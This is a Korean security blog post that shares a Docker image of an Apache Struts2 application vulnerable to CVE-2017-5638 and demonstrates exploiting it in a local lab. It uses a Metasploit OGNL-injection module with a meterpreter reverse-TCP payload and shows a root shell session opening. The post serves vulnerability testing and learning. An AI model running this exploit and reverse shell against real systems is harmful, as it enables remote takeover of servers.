[WEB HACKING] Struts2 RCE(CVE-2017-5638, S2-045) 테스트 및 docker file 공유

매번 Struts2 관련 취약점이 나올때마다 포스팅을 했던 것 같은데요. 오늘 체크하다보니 docker hub에 취약 App 설정이 올라와있어 공유 차 포스팅 작성합니다.

취약점에 대한 내용은 지난 포스팅 참고해주세요. (벌써 반년 넘게 지났군요..)

http://www.hahwul.com/2017/03/web-hacking-apache-struts2-remote-code.html

Dockerfile

https://hub.docker.com/r/piesecurity/apache-struts2-cve-2017-5638/

Dockerfile 내용을 보면..

FROM tomcat:7
MAINTAINER piesecurity <admin@pie-secure.org>
RUN set -ex \
&& rm -rf /usr/local/tomcat/webapps/* \
&& chmod a+x /usr/local/tomcat/bin/*.sh
COPY struts2-showcase-2.3.12.war /usr/local/tomcat/webapps/ROOT.war
EXPOSE 8080

별다른거 없습니다. 취약 버전대 struts2를 tomcat으로 실행하는게 전부이지요.

실행해보죠.

#> docker run –name “struts2-cve” piesecurity/apache-struts2-cve-2017-5638

간단한 팁이지만.. 각 docker 컨테이너의 ip는 container id 값을 가지고 inspect 옵션으로 찾으시면 됩니다.

#> docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 5e2a84ecdcdf piesecurity/apache-struts2-cve-2017-5638 “catalina.sh run” 31 seconds ago Up 30 seconds 8080/tcp silly_kowalevski 444a4a573471 danielguerra/kali-maltego “/usr/bin/supervisord” About an hour ago Up About an hour 0.0.0.0:5900->5900/tcp maltego #> docker inspect 5e2a84ecdcdf [ { “Id”: “5e2a84ecdcdff82283995a06eb4e5b53f0023f3d7422c234f7e20cf435b97c7e”, “Created”: “2017-10-11T05:18:21.432088013Z”, “Path”: “catalina.sh”,

[….]

“Networks”: { “bridge”: { “IPAMConfig”: null, “Links”: null, “Aliases”: null, “NetworkID”: “ea3b29a04dab6e5ec26668ff1d080a96a60a5997de4da9facbd290f057ffffbc”, “EndpointID”: “b49e1f3246d2964ebe24639e9cc0064caab1d3be5828dc9cfbacdbe5b1f14951”, “Gateway”: “172.17.0.1”, “IPAddress”: “172.17.0.3”, “IPPrefixLen”: 16, “IPv6Gateway”: “”, “GlobalIPv6Address”: “”, “GlobalIPv6PrefixLen”: 0, “MacAddress”: “02:42:ac:11:00:03” }

172.17.0.3:8080 으로 붙으니 잘 보이네요 :)

Exploit Struts2 Exploit

(사실 이 부분은 그닥 중요하지 않습니다. 그저 docker 파일 공유가 주목적인 포스팅이라..) metasploit에서 exploiting 하셔도 되고, PoC로 테스트하셔도 됩니다. 올해 나온거로 찾아보면 2개가 있고(둘다 참 거지가.ㅌ…) CVE-2017-5638는 3월꺼니 OGNL Injection으로 선택합니다. HAHWUL > search cve:2017 struts2

Matching Modules

Name Disclosure Date Rank Description —- ————— —- ———– exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Apache Struts Jakarta Multipart Parser OGNL Injection exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Apache Struts 2 REST Plugin XStream RCE

HAHWUL > use exploit/multi/http/struts2_content_type_ognl

RHOST랑 PAYLOAD 등을 세팅하고..

HAHWUL exploit(struts2_content_type_ognl) > HAHWUL exploit(struts2_content_type_ognl) > set RHOST 172.17.0.3 RHOST => 170.17.0.3 HAHWUL exploit(struts2_content_type_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp PAYLOAD => linux/x64/meterpreter/reverse_tcp

HAHWUL exploit(struts2_content_type_ognl) > set LHOST 192.168.56.101 LHOST => 192.168.56.101 HAHWUL exploit(struts2_content_type_ognl) > show options

Module options (exploit/multi/http/struts2_content_type_ognl):

Name Current Setting Required Description —- ————— ——– ———– Proxies no A proxy chain of format type:host:port[,type:host:port][…] RHOST 172.17.0.3 yes The target address RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /struts2-showcase/ yes The path to a struts application action VHOST no HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description —- ————— ——– ———– LHOST 192.168.56.101 yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name – —- 0 Universal

HAHWUL exploit(struts2_content_type_ognl) > set TARGETURI / TARGETURI => /

실행해주시면… 잘 되네요 :)

HAHWUL exploit(struts2_content_type_ognl) > exploit -z

[] Started reverse TCP handler on 192.168.56.101:4444 [] Sending stage (2878936 bytes) to 172.17.0.3 [] Meterpreter session 3 opened (192.168.56.101:4444 -> 172.17.0.3:41584) at 2017-10-11 22:25:16 +0900 [] Session 3 created in the background.

HAHWUL auxiliary(syn) > sessions -l

Active sessions

Id Type Information Connection – —- ———– ———- 3 meterpreter x64/linux uid=0, gid=0, euid=0, egid=0 @ 172.17.0.3 10.67.17.137:4444 -> 172.17.0.3:41584 (172.17.0.3)

HAHWUL auxiliary(syn) > sessions -i 3 [*] Starting interaction with 3…

meterpreter > meterpreter > sysinfo Computer : 172.17.0.3 OS : Debian 8.8 (Linux 4.4.0-96-generic) Architecture : x64 Meterpreter : x64/linux

Reference

https://hub.docker.com/r/piesecurity/apache-struts2-cve-2017-5638/